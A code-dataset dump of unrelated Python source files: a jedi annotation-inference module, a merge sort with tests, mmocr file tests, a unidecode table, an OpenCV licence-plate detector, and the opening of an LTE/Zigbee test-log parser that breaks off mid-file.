max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
src/utils/tools.py | Xuenew/2c | 0 | 17600 | <reponame>Xuenew/2c<gh_stars>0
#!/usr/bin/env python
"""
Created by howie.hu at 2021/4/7.
Description:通用函数
Changelog: all notable changes to this file will be documented
"""
import hashlib
def md5_encryption(string: str) -> str:
"""
对字符串进行md5加密
:param string: 加密目标字符串
:return:
"""
m = hashlib.md5()
m.update(string.encode("utf-8"))
return m.hexdigest()
| 1.976563 | 2 |
anaconda-mode/0.1.13/jedi-0.15.1-py3.7.egg/jedi/evaluate/gradual/annotation.py | space-scl/emacs.d | 2 | 17601 | """
PEP 0484 ( https://www.python.org/dev/peps/pep-0484/ ) describes type hints
through function annotations. There is a strong suggestion in this document
that only the type of type hinting defined in PEP0484 should be allowed
as annotations in future python versions.
"""
import re
from parso import ParserSyntaxError, parse
from jedi._compatibility import force_unicode
from jedi.evaluate.cache import evaluator_method_cache
from jedi.evaluate.base_context import ContextSet, NO_CONTEXTS
from jedi.evaluate.gradual.typing import TypeVar, LazyGenericClass, \
AbstractAnnotatedClass
from jedi.evaluate.gradual.typing import GenericClass
from jedi.evaluate.helpers import is_string
from jedi.evaluate.compiled import builtin_from_name
from jedi import debug
from jedi import parser_utils
def eval_annotation(context, annotation):
"""
Evaluates an annotation node. This means that it evaluates the part of
`int` here:
foo: int = 3
Also checks for forward references (strings)
"""
context_set = context.eval_node(annotation)
if len(context_set) != 1:
debug.warning("Eval'ed typing index %s should lead to 1 object, "
" not %s" % (annotation, context_set))
return context_set
evaled_context = list(context_set)[0]
if is_string(evaled_context):
result = _get_forward_reference_node(context, evaled_context.get_safe_value())
if result is not None:
return context.eval_node(result)
return context_set
def _evaluate_annotation_string(context, string, index=None):
node = _get_forward_reference_node(context, string)
if node is None:
return NO_CONTEXTS
context_set = context.eval_node(node)
if index is not None:
context_set = context_set.filter(
lambda context: context.array_type == u'tuple' # noqa
and len(list(context.py__iter__())) >= index
).py__simple_getitem__(index)
return context_set
def _get_forward_reference_node(context, string):
try:
new_node = context.evaluator.grammar.parse(
force_unicode(string),
start_symbol='eval_input',
error_recovery=False
)
except ParserSyntaxError:
debug.warning('Annotation not parsed: %s' % string)
return None
else:
module = context.tree_node.get_root_node()
parser_utils.move(new_node, module.end_pos[0])
new_node.parent = context.tree_node
return new_node
def _split_comment_param_declaration(decl_text):
"""
Split decl_text on commas, but group generic expressions
together.
For example, given "foo, Bar[baz, biz]" we return
['foo', 'Bar[baz, biz]'].
"""
try:
node = parse(decl_text, error_recovery=False).children[0]
except ParserSyntaxError:
debug.warning('Comment annotation is not valid Python: %s' % decl_text)
return []
if node.type == 'name':
return [node.get_code().strip()]
params = []
try:
children = node.children
except AttributeError:
return []
else:
for child in children:
if child.type in ['name', 'atom_expr', 'power']:
params.append(child.get_code().strip())
return params
@evaluator_method_cache()
def infer_param(execution_context, param):
contexts = _infer_param(execution_context, param)
evaluator = execution_context.evaluator
if param.star_count == 1:
tuple_ = builtin_from_name(evaluator, 'tuple')
return ContextSet([GenericClass(
tuple_,
generics=(contexts,),
) for c in contexts])
elif param.star_count == 2:
dct = builtin_from_name(evaluator, 'dict')
return ContextSet([GenericClass(
dct,
generics=(ContextSet([builtin_from_name(evaluator, 'str')]), contexts),
) for c in contexts])
pass
return contexts
def _infer_param(execution_context, param):
"""
Infers the type of a function parameter, using type annotations.
"""
annotation = param.annotation
if annotation is None:
# If no Python 3-style annotation, look for a Python 2-style comment
# annotation.
# Identify parameters to function in the same sequence as they would
# appear in a type comment.
all_params = [child for child in param.parent.children
if child.type == 'param']
node = param.parent.parent
comment = parser_utils.get_following_comment_same_line(node)
if comment is None:
return NO_CONTEXTS
match = re.match(r"^#\s*type:\s*\(([^#]*)\)\s*->", comment)
if not match:
return NO_CONTEXTS
params_comments = _split_comment_param_declaration(match.group(1))
# Find the specific param being investigated
index = all_params.index(param)
# If the number of parameters doesn't match length of type comment,
# ignore first parameter (assume it's self).
if len(params_comments) != len(all_params):
debug.warning(
"Comments length != Params length %s %s",
params_comments, all_params
)
from jedi.evaluate.context.instance import InstanceArguments
if isinstance(execution_context.var_args, InstanceArguments):
if index == 0:
# Assume it's self, which is already handled
return NO_CONTEXTS
index -= 1
if index >= len(params_comments):
return NO_CONTEXTS
param_comment = params_comments[index]
return _evaluate_annotation_string(
execution_context.function_context.get_default_param_context(),
param_comment
)
# Annotations are like default params and resolve in the same way.
context = execution_context.function_context.get_default_param_context()
return eval_annotation(context, annotation)
def py__annotations__(funcdef):
dct = {}
for function_param in funcdef.get_params():
param_annotation = function_param.annotation
if param_annotation is not None:
dct[function_param.name.value] = param_annotation
return_annotation = funcdef.annotation
if return_annotation:
dct['return'] = return_annotation
return dct
@evaluator_method_cache()
def infer_return_types(function_execution_context):
"""
Infers the type of a function's return value,
according to type annotations.
"""
all_annotations = py__annotations__(function_execution_context.tree_node)
annotation = all_annotations.get("return", None)
if annotation is None:
# If there is no Python 3-type annotation, look for a Python 2-type annotation
node = function_execution_context.tree_node
comment = parser_utils.get_following_comment_same_line(node)
if comment is None:
return NO_CONTEXTS
match = re.match(r"^#\s*type:\s*\([^#]*\)\s*->\s*([^#]*)", comment)
if not match:
return NO_CONTEXTS
return _evaluate_annotation_string(
function_execution_context.function_context.get_default_param_context(),
match.group(1).strip()
).execute_annotation()
if annotation is None:
return NO_CONTEXTS
context = function_execution_context.function_context.get_default_param_context()
unknown_type_vars = list(find_unknown_type_vars(context, annotation))
annotation_contexts = eval_annotation(context, annotation)
if not unknown_type_vars:
return annotation_contexts.execute_annotation()
type_var_dict = infer_type_vars_for_execution(function_execution_context, all_annotations)
return ContextSet.from_sets(
ann.define_generics(type_var_dict)
if isinstance(ann, (AbstractAnnotatedClass, TypeVar)) else ContextSet({ann})
for ann in annotation_contexts
).execute_annotation()
def infer_type_vars_for_execution(execution_context, annotation_dict):
"""
Some functions use type vars that are not defined by the class, but rather
only defined in the function. See for example `iter`. In those cases we
want to:
1. Search for undefined type vars.
2. Infer type vars with the execution state we have.
3. Return the union of all type vars that have been found.
"""
context = execution_context.function_context.get_default_param_context()
annotation_variable_results = {}
executed_params, _ = execution_context.get_executed_params_and_issues()
for executed_param in executed_params:
try:
annotation_node = annotation_dict[executed_param.string_name]
except KeyError:
continue
annotation_variables = find_unknown_type_vars(context, annotation_node)
if annotation_variables:
# Infer unknown type var
annotation_context_set = context.eval_node(annotation_node)
star_count = executed_param._param_node.star_count
actual_context_set = executed_param.infer(use_hints=False)
if star_count == 1:
actual_context_set = actual_context_set.merge_types_of_iterate()
elif star_count == 2:
# TODO _dict_values is not public.
actual_context_set = actual_context_set.try_merge('_dict_values')
for ann in annotation_context_set:
_merge_type_var_dicts(
annotation_variable_results,
_infer_type_vars(ann, actual_context_set),
)
return annotation_variable_results
def _merge_type_var_dicts(base_dict, new_dict):
for type_var_name, contexts in new_dict.items():
try:
base_dict[type_var_name] |= contexts
except KeyError:
base_dict[type_var_name] = contexts
def _infer_type_vars(annotation_context, context_set):
"""
This function tries to find information about undefined type vars and
returns a dict from type var name to context set.
This is for example important to understand what `iter([1])` returns.
According to typeshed, `iter` returns an `Iterator[_T]`:
def iter(iterable: Iterable[_T]) -> Iterator[_T]: ...
This functions would generate `int` for `_T` in this case, because it
unpacks the `Iterable`.
"""
type_var_dict = {}
if isinstance(annotation_context, TypeVar):
return {annotation_context.py__name__(): context_set.py__class__()}
elif isinstance(annotation_context, LazyGenericClass):
name = annotation_context.py__name__()
if name == 'Iterable':
given = annotation_context.get_generics()
if given:
for nested_annotation_context in given[0]:
_merge_type_var_dicts(
type_var_dict,
_infer_type_vars(
nested_annotation_context,
context_set.merge_types_of_iterate()
)
)
elif name == 'Mapping':
given = annotation_context.get_generics()
if len(given) == 2:
for context in context_set:
try:
method = context.get_mapping_item_contexts
except AttributeError:
continue
key_contexts, value_contexts = method()
for nested_annotation_context in given[0]:
_merge_type_var_dicts(
type_var_dict,
_infer_type_vars(
nested_annotation_context,
key_contexts,
)
)
for nested_annotation_context in given[1]:
_merge_type_var_dicts(
type_var_dict,
_infer_type_vars(
nested_annotation_context,
value_contexts,
)
)
return type_var_dict
def find_type_from_comment_hint_for(context, node, name):
return _find_type_from_comment_hint(context, node, node.children[1], name)
def find_type_from_comment_hint_with(context, node, name):
assert len(node.children[1].children) == 3, \
"Can only be here when children[1] is 'foo() as f'"
varlist = node.children[1].children[2]
return _find_type_from_comment_hint(context, node, varlist, name)
def find_type_from_comment_hint_assign(context, node, name):
return _find_type_from_comment_hint(context, node, node.children[0], name)
def _find_type_from_comment_hint(context, node, varlist, name):
index = None
if varlist.type in ("testlist_star_expr", "exprlist", "testlist"):
# something like "a, b = 1, 2"
index = 0
for child in varlist.children:
if child == name:
break
if child.type == "operator":
continue
index += 1
else:
return []
comment = parser_utils.get_following_comment_same_line(node)
if comment is None:
return []
match = re.match(r"^#\s*type:\s*([^#]*)", comment)
if match is None:
return []
return _evaluate_annotation_string(
context, match.group(1).strip(), index
).execute_annotation()
def find_unknown_type_vars(context, node):
def check_node(node):
if node.type in ('atom_expr', 'power'):
trailer = node.children[-1]
if trailer.type == 'trailer' and trailer.children[0] == '[':
for subscript_node in _unpack_subscriptlist(trailer.children[1]):
check_node(subscript_node)
else:
type_var_set = context.eval_node(node)
for type_var in type_var_set:
if isinstance(type_var, TypeVar) and type_var not in found:
found.append(type_var)
found = [] # We're not using a set, because the order matters.
check_node(node)
return found
def _unpack_subscriptlist(subscriptlist):
if subscriptlist.type == 'subscriptlist':
for subscript in subscriptlist.children[::2]:
if subscript.type != 'subscript':
yield subscript
else:
if subscriptlist.type != 'subscript':
yield subscriptlist
| 3.109375 | 3 |
string_30.py | Technicoryx/python_strings_inbuilt_functions | 0 | 17602 | """Below Python Programme demonstrate rpartition
functions in a string"""
string = "Python is fun"
# 'is' separator is found
print(string.rpartition('is '))
# 'not' separator is not found
print(string.rpartition('not '))
string = "Python is fun, isn't it"
# splits at last occurence of 'is'
print(string.rpartition('is'))
| 4.09375 | 4 |
env/lib/python3.8/site-packages/unidecode/x054.py | avdhari/enigma | 48 | 17603 | <filename>env/lib/python3.8/site-packages/unidecode/x054.py
data = (
'Mie ', # 0x00
'Xu ', # 0x01
'Mang ', # 0x02
'Chi ', # 0x03
'Ge ', # 0x04
'Xuan ', # 0x05
'Yao ', # 0x06
'Zi ', # 0x07
'He ', # 0x08
'Ji ', # 0x09
'Diao ', # 0x0a
'Cun ', # 0x0b
'Tong ', # 0x0c
'Ming ', # 0x0d
'Hou ', # 0x0e
'Li ', # 0x0f
'Tu ', # 0x10
'Xiang ', # 0x11
'Zha ', # 0x12
'Xia ', # 0x13
'Ye ', # 0x14
'Lu ', # 0x15
'A ', # 0x16
'Ma ', # 0x17
'Ou ', # 0x18
'Xue ', # 0x19
'Yi ', # 0x1a
'Jun ', # 0x1b
'Chou ', # 0x1c
'Lin ', # 0x1d
'Tun ', # 0x1e
'Yin ', # 0x1f
'Fei ', # 0x20
'Bi ', # 0x21
'Qin ', # 0x22
'Qin ', # 0x23
'Jie ', # 0x24
'Bu ', # 0x25
'Fou ', # 0x26
'Ba ', # 0x27
'Dun ', # 0x28
'Fen ', # 0x29
'E ', # 0x2a
'Han ', # 0x2b
'Ting ', # 0x2c
'Hang ', # 0x2d
'Shun ', # 0x2e
'Qi ', # 0x2f
'Hong ', # 0x30
'Zhi ', # 0x31
'Shen ', # 0x32
'Wu ', # 0x33
'Wu ', # 0x34
'Chao ', # 0x35
'Ne ', # 0x36
'Xue ', # 0x37
'Xi ', # 0x38
'Chui ', # 0x39
'Dou ', # 0x3a
'Wen ', # 0x3b
'Hou ', # 0x3c
'Ou ', # 0x3d
'Wu ', # 0x3e
'Gao ', # 0x3f
'Ya ', # 0x40
'Jun ', # 0x41
'Lu ', # 0x42
'E ', # 0x43
'Ge ', # 0x44
'Mei ', # 0x45
'Ai ', # 0x46
'Qi ', # 0x47
'Cheng ', # 0x48
'Wu ', # 0x49
'Gao ', # 0x4a
'Fu ', # 0x4b
'Jiao ', # 0x4c
'Hong ', # 0x4d
'Chi ', # 0x4e
'Sheng ', # 0x4f
'Ne ', # 0x50
'Tun ', # 0x51
'Fu ', # 0x52
'Yi ', # 0x53
'Dai ', # 0x54
'Ou ', # 0x55
'Li ', # 0x56
'Bai ', # 0x57
'Yuan ', # 0x58
'Kuai ', # 0x59
'[?] ', # 0x5a
'Qiang ', # 0x5b
'Wu ', # 0x5c
'E ', # 0x5d
'Shi ', # 0x5e
'Quan ', # 0x5f
'Pen ', # 0x60
'Wen ', # 0x61
'Ni ', # 0x62
'M ', # 0x63
'Ling ', # 0x64
'Ran ', # 0x65
'You ', # 0x66
'Di ', # 0x67
'Zhou ', # 0x68
'Shi ', # 0x69
'Zhou ', # 0x6a
'Tie ', # 0x6b
'Xi ', # 0x6c
'Yi ', # 0x6d
'Qi ', # 0x6e
'Ping ', # 0x6f
'Zi ', # 0x70
'Gu ', # 0x71
'Zi ', # 0x72
'Wei ', # 0x73
'Xu ', # 0x74
'He ', # 0x75
'Nao ', # 0x76
'Xia ', # 0x77
'Pei ', # 0x78
'Yi ', # 0x79
'Xiao ', # 0x7a
'Shen ', # 0x7b
'Hu ', # 0x7c
'Ming ', # 0x7d
'Da ', # 0x7e
'Qu ', # 0x7f
'Ju ', # 0x80
'Gem ', # 0x81
'Za ', # 0x82
'Tuo ', # 0x83
'Duo ', # 0x84
'Pou ', # 0x85
'Pao ', # 0x86
'Bi ', # 0x87
'Fu ', # 0x88
'Yang ', # 0x89
'He ', # 0x8a
'Zha ', # 0x8b
'He ', # 0x8c
'Hai ', # 0x8d
'Jiu ', # 0x8e
'Yong ', # 0x8f
'Fu ', # 0x90
'Que ', # 0x91
'Zhou ', # 0x92
'Wa ', # 0x93
'Ka ', # 0x94
'Gu ', # 0x95
'Ka ', # 0x96
'Zuo ', # 0x97
'Bu ', # 0x98
'Long ', # 0x99
'Dong ', # 0x9a
'Ning ', # 0x9b
'Tha ', # 0x9c
'Si ', # 0x9d
'Xian ', # 0x9e
'Huo ', # 0x9f
'Qi ', # 0xa0
'Er ', # 0xa1
'E ', # 0xa2
'Guang ', # 0xa3
'Zha ', # 0xa4
'Xi ', # 0xa5
'Yi ', # 0xa6
'Lie ', # 0xa7
'Zi ', # 0xa8
'Mie ', # 0xa9
'Mi ', # 0xaa
'Zhi ', # 0xab
'Yao ', # 0xac
'Ji ', # 0xad
'Zhou ', # 0xae
'Ge ', # 0xaf
'Shuai ', # 0xb0
'Zan ', # 0xb1
'Xiao ', # 0xb2
'Ke ', # 0xb3
'Hui ', # 0xb4
'Kua ', # 0xb5
'Huai ', # 0xb6
'Tao ', # 0xb7
'Xian ', # 0xb8
'E ', # 0xb9
'Xuan ', # 0xba
'Xiu ', # 0xbb
'Wai ', # 0xbc
'Yan ', # 0xbd
'Lao ', # 0xbe
'Yi ', # 0xbf
'Ai ', # 0xc0
'Pin ', # 0xc1
'Shen ', # 0xc2
'Tong ', # 0xc3
'Hong ', # 0xc4
'Xiong ', # 0xc5
'Chi ', # 0xc6
'Wa ', # 0xc7
'Ha ', # 0xc8
'Zai ', # 0xc9
'Yu ', # 0xca
'Di ', # 0xcb
'Pai ', # 0xcc
'Xiang ', # 0xcd
'Ai ', # 0xce
'Hen ', # 0xcf
'Kuang ', # 0xd0
'Ya ', # 0xd1
'Da ', # 0xd2
'Xiao ', # 0xd3
'Bi ', # 0xd4
'Yue ', # 0xd5
'[?] ', # 0xd6
'Hua ', # 0xd7
'Sasou ', # 0xd8
'Kuai ', # 0xd9
'Duo ', # 0xda
'[?] ', # 0xdb
'Ji ', # 0xdc
'Nong ', # 0xdd
'Mou ', # 0xde
'Yo ', # 0xdf
'Hao ', # 0xe0
'Yuan ', # 0xe1
'Long ', # 0xe2
'Pou ', # 0xe3
'Mang ', # 0xe4
'Ge ', # 0xe5
'E ', # 0xe6
'Chi ', # 0xe7
'Shao ', # 0xe8
'Li ', # 0xe9
'Na ', # 0xea
'Zu ', # 0xeb
'He ', # 0xec
'Ku ', # 0xed
'Xiao ', # 0xee
'Xian ', # 0xef
'Lao ', # 0xf0
'Bo ', # 0xf1
'Zhe ', # 0xf2
'Zha ', # 0xf3
'Liang ', # 0xf4
'Ba ', # 0xf5
'Mie ', # 0xf6
'Le ', # 0xf7
'Sui ', # 0xf8
'Fou ', # 0xf9
'Bu ', # 0xfa
'Han ', # 0xfb
'Heng ', # 0xfc
'Geng ', # 0xfd
'Shuo ', # 0xfe
'Ge ', # 0xff
)
| 1.304688 | 1 |
merge_sort.py | BCLaird/refreshers | 0 | 17604 | <filename>merge_sort.py<gh_stars>0
import sys
import unittest
def merge(nums1, nums2):
"""
:param nums1: Sorted list of numbers.
:param nums2: Sorted list of numbers.
:return: Combined sorted list of numbers.
"""
merged = list()
while len(nums1) != 0 and len(nums2) != 0:
if nums1[0] <= nums2[0]:
merged.append(nums1.pop(0))
else:
merged.append(nums2.pop(0))
while len(nums1) != 0:
merged.append(nums1.pop(0))
while len(nums2) != 0:
merged.append(nums2.pop(0))
return merged
def merge_sort(nums):
"""
:param nums: List of numbers to sort.
:return: Sorted list of numbers.
"""
if len(nums) != 1:
nums1 = merge_sort(nums[:(len(nums) / 2)])
nums2 = merge_sort(nums[(len(nums) / 2):])
sorted_nums = merge(nums1, nums2)
return sorted_nums
else:
# Nothing to do for a list of length 1.
return nums
class TestInsertionSort(unittest.TestCase):
def test_one(self):
self.assertEqual([1], merge_sort([1]))
def test_two(self):
unsorted = [2, 1]
sorted = [1, 2]
self.assertEqual(sorted, merge_sort(unsorted))
def test_three(self):
unsorted = [2, 3, 1]
sorted = [1, 2, 3]
self.assertEqual(sorted, merge_sort(unsorted))
def test_reversed(self):
unsorted = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]
sorted = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
self.assertEqual(sorted, merge_sort(unsorted))
def test_front_half_sorted(self):
unsorted = [1, 2, 3, 4, 5, 10, 9, 8, 7, 6]
sorted = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
self.assertEqual(sorted, merge_sort(unsorted))
def test_back_half_sorted(self):
unsorted = [5, 4, 3, 2, 1, 6, 7, 8, 9, 10]
sorted = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
self.assertEqual(sorted, merge_sort(unsorted))
if __name__ == "__main__":
sys.stdout.write("<NAME>aird merge_sort module. Test mode.\n")
sys.exit(unittest.main())
| 3.890625 | 4 |
tests/test_utils/test_textio.py | hongxuenong/mmocr | 2,261 | 17605 | # Copyright (c) OpenMMLab. All rights reserved.
import tempfile
from mmocr.utils import list_from_file, list_to_file
lists = [
[],
[' '],
['\t'],
['a'],
[1],
[1.],
['a', 'b'],
['a', 1, 1.],
[1, 1., 'a'],
['啊', '啊啊'],
['選択', 'noël', 'Информацией', 'ÄÆä'],
]
def test_list_to_file():
with tempfile.TemporaryDirectory() as tmpdirname:
for i, lines in enumerate(lists):
filename = f'{tmpdirname}/{i}.txt'
list_to_file(filename, lines)
lines2 = [
line.rstrip('\r\n')
for line in open(filename, 'r', encoding='utf-8').readlines()
]
lines = list(map(str, lines))
assert len(lines) == len(lines2)
assert all(line1 == line2 for line1, line2 in zip(lines, lines2))
def test_list_from_file():
with tempfile.TemporaryDirectory() as tmpdirname:
for encoding in ['utf-8', 'utf-8-sig']:
for lineend in ['\n', '\r\n']:
for i, lines in enumerate(lists):
filename = f'{tmpdirname}/{i}.txt'
with open(filename, 'w', encoding=encoding) as f:
f.writelines(f'{line}{lineend}' for line in lines)
lines2 = list_from_file(filename, encoding=encoding)
lines = list(map(str, lines))
assert len(lines) == len(lines2)
assert all(line1 == line2
for line1, line2 in zip(lines, lines2))
| 2.9375 | 3 |
License Plate Detection.py | jairajsahgal/License_Plate_and_Face_Recognition | 0 | 17606 | import cv2
from Text_Detection import detect_characters, detect_string, detect_words
import re
from live_recognition import facial_recognition
#
def rescale_frame(frame, percent=75):
width = int(frame.shape[1] * percent/ 100)
height = int(frame.shape[0] * percent/ 100)
dim = (width, height)
return cv2.resize(frame, dim, interpolation =cv2.INTER_AREA)
####################################################
frameWidth = 640
frameHeight = 480
nPlateCascade = cv2.CascadeClassifier("../../Resources/haarcascade_russian_plate_number.xml")
minArea=500
color=(255,0,255)
name=None
# count = 0
state_codes = ['AP', 'AR', 'AS', 'BR', 'CG', 'GA', 'GJ', 'HR', 'HP', 'JH', 'KA', 'KL', 'MP', 'MH', 'MN', 'ML', 'MZ', 'NL', 'OD', 'PB', 'RJ', 'SK', 'TN', 'TR', 'UP', 'WB', 'TS','ap', 'ar', 'as', 'br', 'cg', 'ga', 'gj', 'hr', 'hp', 'jh', 'ka', 'kl', 'mp', 'mh', 'mn', 'ml', 'mz', 'nl', 'od', 'pb', 'rj', 'sk', 'tn', 'tr', 'up', 'wb', 'ts']
######################################################
# cap = cv2.VideoCapture("C:\\Users\\jaira\\PycharmProjects\\opencv_tutorial\\Resources\\test.mp4")
cap=cv2.VideoCapture(0,cv2.CAP_DSHOW)
cap.set(3, frameWidth)
cap.set(4, frameHeight)
cap.set(10,150)
success, img = cap.read()
while success:
success, img = cap.read()
imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
numberPlates = nPlateCascade.detectMultiScale(imgGray, 1.1, 4)
for (x, y, w, h) in numberPlates:
area = w*h
if area > minArea:
cv2.rectangle(img=img,pt1=(x,y),pt2=(x+w,y+h),
color=color,thickness=2)
# cv2.putText(img=img,text="Number Plate",org=(x,y-5),fontFace=cv2.FONT_HERSHEY_COMPLEX_SMALL,color=color,fontScale=1,thickness=2)
imgRoi=img[y:y+h,x:x+w]
cv2.moveWindow("ROI",40,30)
cv2.imshow(winname="ROI",mat=imgRoi)
temp=detect_words(imgRoi)
for i in state_codes:
if i in temp:
temp2 = ''.join(ch for ch in temp if ch.isalnum() and ch!="." and ch!="_")
if temp[-2:].isnumeric() and temp[2:4].isnumeric() and len(temp)==10:
cv2.putText(img=img,text=temp,org=(x,y-5),fontFace=cv2.FONT_HERSHEY_COMPLEX_SMALL,color=color,fontScale=1,thickness=2)
print(temp)
if name==None:
name,face_img=facial_recognition(img)
cv2.imshow("Face Recognition",face_img)
cv2.imshow("Result", img)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# except:
# break
cv2.destroyAllWindows() | 2.734375 | 3 |
LogParser/LTEV2.py | a22057916w/python_advance | 0 | 17607 | ##! python3
##==============================================================================
## Copyright (c) 2021 COMPAL Electronic Inc. All rights reserved.
## This program contains proprietary and confidential information.
## All rights reserved except as may be permitted by prior written consent.
##
## Compal STiD NPSD Test Program Release Notification.
##
## ModuleName:
## LTE.py (Log to Excel)
##
## Abstract:
## Parsing log info to a excel with 4 sheets.
## 1. Read log file: parse -> store (a list of dict)
## 2. Read the INI threshold data: store as dict
## 3. New excel workbook: by openpyxl
## 4. Set worksheet according to Step 1: by dict and DataFrame
## 5. Set condition formating for each sheet
## according to Step 2: by dict
## 6. Save the workbook to xlsx file
##
## Author:
## 25-Oct-2021 <NAME>
##
## Revision History:
## Rev 1.0.0.1 25-Oct-2021 Willy
## First create.
##==============================================================================
import re
import os
import sys
import pandas as pd
import codecs
import time
import configparser
import openpyxl
from openpyxl.utils.dataframe import dataframe_to_rows
from openpyxl.styles import Font, Fill, colors
from openpyxl.formatting.rule import CellIsRule
# [Main]
g_strVersion = "3.0.0.1"
#[ParseLogPath]
g_strLogDir = "./Log/Pass"
class cLogParser:
listKey = ["Power_dBm_CH15", "Power_dBm_CH21", "Power_dBm_CH24", "Current_mA_CH15", "Current_mA_CH21", "Current_mA_CH24", "dBm_LNA_ON", "dBm_LNA_Off",
"Current_mA_3G_CH9750", "Current_mA_3G_CH2787", "Current_mA_2G_CH124", "dBm_CH9750", "dBm_CH2787", "dBm_2G_CH124", "dBm_CH124"]
listInfo, listLTE, listZigbee = [], [], []
def __init__(self):
# get directory names of TryingLog (first layer)
listSN = os.listdir(g_strLogDir)
# iterate through log files in a SN folder (second layer)
self.parseLog(listSN)
# merge data from two different log files
self.mergeLogs()
def parseLog(self, listSN):
printLog("[I][parseLog] ------- Start Parsing Log -------")
strLTEName, strZigbeeName = "GFI20_RF_LTE.log", "GFI20_RF_Zigbee.log"
try:
for strSN in listSN:
dictLTE = {
"SN" : strSN,
"dBm_CH9750" : None,
"dBm_CH2787" : None,
"dBm_2G_CH124" : None,
"Current_mA_3G_CH9750" : None,
"Current_mA_3G_CH2787" : None,
"Current_mA_2G_CH124" : None,
"dBm_CH124" : None }
dictZigbee = {
"SN" : strSN,
"Power_dBm_CH15" : None,
"Power_dBm_CH21" : None,
"Power_dBm_CH24" : None,
"dBm_LNA_ON" : None,
"dBm_LNA_Off" : None,
"Current_mA_CH15" : None,
"Current_mA_CH21" : None,
"Current_mA_CH24" : None }
b_hasLTE, b_hasZigbee = False, False # flag for checking if the target log exists
strSNLog = os.path.join(g_strLogDir, strSN) # set abspath for SN logs
for strLogName in os.listdir(strSNLog):
strLogPath = os.path.join(strSNLog, strLogName)
# check GFI20_RF_LTE.log exists. If not, flag = False and parse only SN.
reMatch = re.fullmatch("^.*RF_LTE\.log", strLogName)
if(reMatch != None):
self.parseLTE(dictLTE, strLogPath, strSN)
b_hasLTE = True
# parse GFI20_RF_Zigbee.log files
reMatch = re.fullmatch("^.*RF_Zigbee\.log", strLogName)
if(reMatch != None):
self.parseZigbee(dictZigbee, strLogPath, strSN)
b_hasZigbee = True
# if log not exists, append initial dict
self.listLTE.append(dictLTE)
self.listZigbee.append(dictZigbee)
# if there is no target log file in the folder, parse only SN
if not b_hasLTE:
#listLTE.append({"SN": strSN})
printLog("[W][ParseLog] Cannot find log: %s" % os.path.join(strSN, strLTEName))
if not b_hasZigbee:
#listZigbee.append({"SN" : strSN})
printLog("[W][ParseLog] Cannot find log: %s" % os.path.join(strSN, strZigbeeName))
printLog("[I][parseLog] ------- Finish Parsing Log -------")
except Exception as e:
printLog("[E][parseLog] Unexpected Error: " + str(e))
def parseLTE(self, dictLTE, strLTEPath, strSN):
printLog("[I][parseLTE] Parse LTE log: %s" % strLTEPath)
try:
listPostfix = [" \n", " A\n", " dBm\n"]
with open(strLTEPath, encoding='big5') as log: # big5 for windows
content = log.readlines()
for line in content:
re_power = "Power: [+-]?[0-9]+\.?[0-9]*"
re_current = "Current: [+-]?[0-9]+\.?[0-9]* A"
re_RX_RSSI = "Rx RSSI: [+-]?[0-9]+\.?[0-9]* dBm"
if re.search("-+ LTE_3G Freq 897.4 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictLTE, re_power, self.listKey[11], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictLTE, re_current, self.listKey[8], listPostfix[1], 1000, False)
if re.search("-+ LTE_3G Freq 1950 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictLTE, re_power, self.listKey[12], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictLTE, re_current, self.listKey[9], listPostfix[1], 1000, False)
if re.search("-+ LTE_2G Freq 914.8 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictLTE, re_power, self.listKey[13], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictLTE, re_current, self.listKey[10], listPostfix[1], 1000, False)
if re.search("-+ LTE_2G Freq 959.8 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictLTE, re_RX_RSSI, self.listKey[14], listPostfix[2], 1, True)
except Exception as e:
printLog("[E][parseLTE] Unexpected Error: " + str(e))
def parseZigbee(self, dictZigbee, strZigBeePath, strSN):
printLog("[I][parseZigbee] Parse Zigbee log: %s" % strZigBeePath)
try:
listPostfix = ["dBm\n", " A\n", " dBm\n"]
with open(strZigBeePath, encoding="big5") as Zigbee: # big5 for windows
content = Zigbee.readlines()
for line in content:
re_power = "Power: [+-]?[0-9]+\.?[0-9]* dBm"
re_current = "Current: [+-]?[0-9]+\.?[0-9]* A"
re_RX_RSSI = "Rx RSSI: [+-]?[0-9]+\.?[0-9]* dBm"
if re.search("-+ ZIGBEE_2450 Freq 2425 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_power, self.listKey[0], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictZigbee, re_current, self.listKey[3], listPostfix[1], 1000, False)
if re.search("-+ ZIGBEE_2450 Freq 2455 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_power, self.listKey[1], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictZigbee, re_current, self.listKey[4], listPostfix[1], 1000, False)
if re.search("-+ ZIGBEE_2450 Freq 2470 -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_power, self.listKey[2], listPostfix[0], 1, False)
self.get_log_value(tmp_content, dictZigbee, re_current, self.listKey[5], listPostfix[1], 1000, False)
if re.search("-+ LNA ON -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_RX_RSSI, self.listKey[6], listPostfix[2], 1, False)
if re.search("-+ LNA OFF -+", line) != None:
idx = content.index(line)
tmp_content = content[idx:]
self.get_log_value(tmp_content, dictZigbee, re_RX_RSSI, self.listKey[7], listPostfix[2], 1, False)
except Exception as e:
printLog("[E][parseZigbee] Unexpected Error: " + str(e))
